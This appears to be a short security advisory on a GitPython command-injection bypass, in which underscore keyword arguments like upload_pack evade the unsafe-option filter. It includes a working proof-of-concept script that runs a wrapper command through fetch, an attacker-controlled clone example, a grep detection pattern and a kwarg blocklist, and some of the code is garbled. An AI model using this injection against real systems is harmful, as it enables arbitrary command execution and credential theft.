Listen to this Post
The vulnerability stems from a bypass in GitPython’s unsafe-option filtering. GitPython blocks dangerous Git command-line flags such as `–upload-pack` and --receive-pack, which can be used to execute arbitrary commands. However, it only checks the hyphenated forms of these flags (e.g., upload-pack). Python’s keyword argument (kwarg) syntax requires using underscores (upload_pack). GitPython’s validation routine runs `Git.check_unsafe_options()` on the raw kwarg names before they are normalized. Later, `Git.transform_kwarg()` dashifies underscores (upload_pack → --upload-pack), but the safety check has already passed because the underscore form is not on the blocklist. As a result, an attacker can supply `upload_pack` or `receive_pack` to methods like Repo.clone_from(), Remote.fetch(), Remote.pull(), or `Remote.push()` to execute arbitrary commands on the host, even with allow_unsafe_options=False. This bypass is possible because the code does not block the Python-native underscore spelling, allowing it to slip past validation and become a dangerous Git flag. For exec, the raw kwarg name matches the blocked option (exec), so it is correctly prevented.
DailyCVE Form:
Platform: GitPython
Version: 3.1.30-3.1.46
Vulnerability: Command Injection
Severity: High
date: 2026-04-25
Prediction: 2026-04-25
Analytics under What Undercode Say:
Bash Commands and Codes:
1. Check your GitPython version
python -c "import git; print(git.<strong>version</strong>)"
2. Simulate vulnerable behavior (PoC)
cat > exploit.py << 'EOF'
import os, tempfile
from git import Repo
wrapper = os.path.join(tempfile.mkdtemp(), "wrapper.sh")
with open(wrapper, "w") as f: f.write("!/bin/sh\ntouch /tmp/pwned\nexec git-upload-pack \"$@\"")
os.chmod(wrapper, 0o755)
repo = Repo("/tmp/victim")
repo.remote("origin").fetch(upload_pack=wrapper) Underscore bypass
EOF
python exploit.py
3. Detection script for vulnerable patterns
grep -r "upload_pack|receive_pack" --include=".py"
4. Mitigation: upgrade to fixed version
pip install --upgrade GitPython==3.1.47
5. Alternative mitigation: block underscore kwargs programmatically
cat > pre_commit_hook.py << 'EOF'
def validate_gitpython_kwargs(kwargs):
forbidden = ["upload_pack", "receive_pack"]
for key in kwargs:
if key in forbidden:
raise ValueError(f"Blocked unsafe kwarg: {key}")
EOF
Exploit:
Attackers control the `upload_pack` or `receive_pack` keyword argument in a GitPython call. For example:
`repo.clone_from(attacker_url, local_path, upload_pack=”/path/to/malicious/helper”)`.
The argument is converted to --upload-pack=/path/to/malicious/helper, instructing Git to execute the attacker’s script. The helper runs with the privileges of the GitPython process, enabling arbitrary command execution.
Protection from this CVE:
- Upgrade GitPython to version 3.1.47 or later.
- Input validation: Never pass user-controlled kwargs directly to GitPython methods.
- Code review: Check for `kwargs` in calls to
clone_from,fetch,pull,push. - Least privilege: Run GitPython processes with minimal OS permissions.
- Use a WAF/API gateway to filter `upload_pack` and `receive_pack` strings in JSON/YAML inputs.
Impact:
- Arbitrary command execution on the host running GitPython.
- Credential theft: SSH keys, API tokens, cloud credentials.
- Lateral movement in CI/CD pipelines or automation systems.
- Repository compromise: Modify builds, artifacts, or source code.
- Full service takeover in web apps that process user-supplied Git options.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

